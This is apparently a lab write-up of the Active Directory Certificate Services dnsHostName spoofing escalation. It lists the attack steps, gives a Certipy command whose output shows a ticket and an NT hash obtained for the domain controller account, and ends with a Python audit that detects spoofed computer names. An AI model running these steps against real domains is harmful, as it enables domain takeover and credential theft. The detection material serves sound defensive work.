Oliver Lyak found a way for a low-privileged domain user to escalate privileges in Active Directory. It consists of changing the dnsHostName attribute of a computer account the user created. The idea is the same as the sAMAccountName spoofing vulnerability: a name confusion during authentication, here when AD CS issues a certificate for the spoofed name. Details are here :
An authenticated user could manipulate attributes on computer accounts they own or manage, and acquire a certificate from Active Directory Certificate Services that would allow elevation of privilege to System.
Create a computer account with a domain user and set its dnsHostName to a fake DNS name: the domain controller's.
Authenticate with the certificate as baltimore (the DC)
sudo certipy auth -pfx baltimore.pfx -username 'baltimore$' -domain maryland.local -dc-ip 192.168.56.12
Certipy v4.3.0 - by Oliver Lyak (ly4k)
[*] Using principal: baltimore$@maryland.local
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'baltimore.ccache'
[*] Trying to retrieve NT hash for 'baltimore$'
[*] Got hash for 'baltimore$@maryland.local': aad3b435b51404eeaad3b435b51404ee:d06fbfbf20638881486242cfa9827759
Add the variable to the working environment
Dump the NTDS with the Kerberos ticket we just got
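From the defender's side, the condition abused above is visible in the directory: a computer object whose dnsHostName does not correspond to its own sAMAccountName, or that reuses a domain controller's name. The audit below is an added example, not code from the original post or from Certipy; the Computer records and the DC list are constructed inline (in practice they would come from an LDAP query for objectClass=computer returning sAMAccountName and dNSHostName).

```python
from dataclasses import dataclass

@dataclass
class Computer:
    sam_account_name: str   # e.g. "BALTIMORE$"
    dns_host_name: str      # e.g. "baltimore.maryland.local"

DOMAIN = "maryland.local"

def expected_dns_name(sam_account_name, domain=DOMAIN):
    """A computer 'HOST$' is expected to carry dnsHostName 'host.<domain>'."""
    return f"{sam_account_name.rstrip('$').lower()}.{domain.lower()}"

def audit(computers, dc_dns_names, domain=DOMAIN):
    """Return (sAMAccountName, reason) tuples for suspicious computer objects."""
    dcs = {n.lower() for n in dc_dns_names}
    first_seen = {}        # dnsHostName -> first sAMAccountName carrying it
    findings = []
    for c in computers:
        dns = c.dns_host_name.lower()
        if dns != expected_dns_name(c.sam_account_name, domain):
            findings.append((c.sam_account_name, f"dnsHostName '{dns}' does not match sAMAccountName"))
            # A DC's name on an account that is not that DC: the spoof described in the text.
            if dns in dcs:
                findings.append((c.sam_account_name, f"dnsHostName '{dns}' is a domain controller name"))
        if dns in first_seen:
            findings.append((c.sam_account_name, f"dnsHostName '{dns}' already used by {first_seen[dns]}"))
        else:
            first_seen[dns] = c.sam_account_name
    return findings

# Constructed sample: the legitimate DC, a user-created machine spoofing its name, a normal host.
SAMPLE = [
    Computer("BALTIMORE$", "baltimore.maryland.local"),
    Computer("WS01$", "baltimore.maryland.local"),
    Computer("WS02$", "ws02.maryland.local"),
]
SAMPLE_DCS = ["baltimore.maryland.local"]

def run_sample():
    return audit(SAMPLE, SAMPLE_DCS)

if __name__ == "__main__":
    for sam, reason in run_sample():
        print(f"{sam}: {reason}")
```

Only WS01$ is reported, with all three reasons; the legitimate DC and WS02$ pass. The same check run periodically, or on each modification of dNSHostName, gives an alert before any certificate is requested for the spoofed name.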